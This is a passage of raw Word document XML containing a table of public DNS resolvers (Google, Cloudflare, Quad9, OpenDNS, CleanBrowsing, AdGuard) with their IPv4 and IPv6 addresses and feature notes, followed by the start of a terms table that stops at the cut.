          <w:p w14:paraId="378B56BC" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Secondary IPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="778B3632" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Primary IPv6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32AB1C71" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Secondary IPv6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="696EF3B0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="14E8CB0D" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E7489A3" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Google</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D120CF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE482EF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>8.8.4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="457FED94" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2001:4860:4860::8888</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57CA300A" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2001:4860:4860::8844</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02A1D158" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>Fast, global, supports DNSSEC, DoH, DoT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="1A960E93" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41C28066" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC4AF41" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>1.1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D844786" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>1.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36B8C3A3" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2606:4700:4700::1111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69360387" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2606:4700:4700::1001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58323E8A" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>Privacy</w:t>
            </w:r>
            <w:r w:rsidRPr="00197245">
              <w:noBreakHyphen/>
              <w:t>focused, very low latency, supports DNSSEC, DoH, DoT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="0C9250F6" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09B9DA19" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Quad9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F0A981" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>9.9.9.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A38B15" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>149.112.112.112</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D1BA0EE" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2620:fe::fe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F9D7C7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2620:fe::9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36D7B6F3" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>Security</w:t>
            </w:r>
            <w:r w:rsidRPr="00197245">
              <w:noBreakHyphen/>
              <w:t>focused, blocks known malicious domains, DNSSEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="4985DC6C" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6438A82F" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>OpenDNS (Cisco)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C990377" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>208.67.222.222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4526D7C1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>208.67.220.220</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E2FD3C3" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2620:119:35::35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BDBD914" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2620:119:53::53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C2383D9" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>Offers filtering, parental controls, DNSSEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="4E6CD55F" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F65E4BE" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CleanBrowsing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>(Security Filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="730507C4" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>185.228.168.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2307D3A1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>185.228.169.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E4E90D7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2a0d:2a00:1::2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="271781A4" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2a0d:2a00:2::2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD53C08" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>Blocks adult/malicious content, DNSSEC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="010C5478" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40428EE1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>AdGuard DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="547020C2" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>94.140.14.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA59634" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>94.140.15.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27804007" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2a10:50c0::ad1:ff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E251F2F" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>2a10:50c0::ad2:ff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712A5BB0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>Blocks ads, trackers, malicious sites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="511137DD" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2268"/>
        <w:gridCol w:w="7764"/>
        <w:gridCol w:w="7464"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="66765F47" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C9902F0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7764" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35127479" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="200B2425" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How It’s Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="02D55D71" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66321DB4" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Primary DNS IP</w:t>
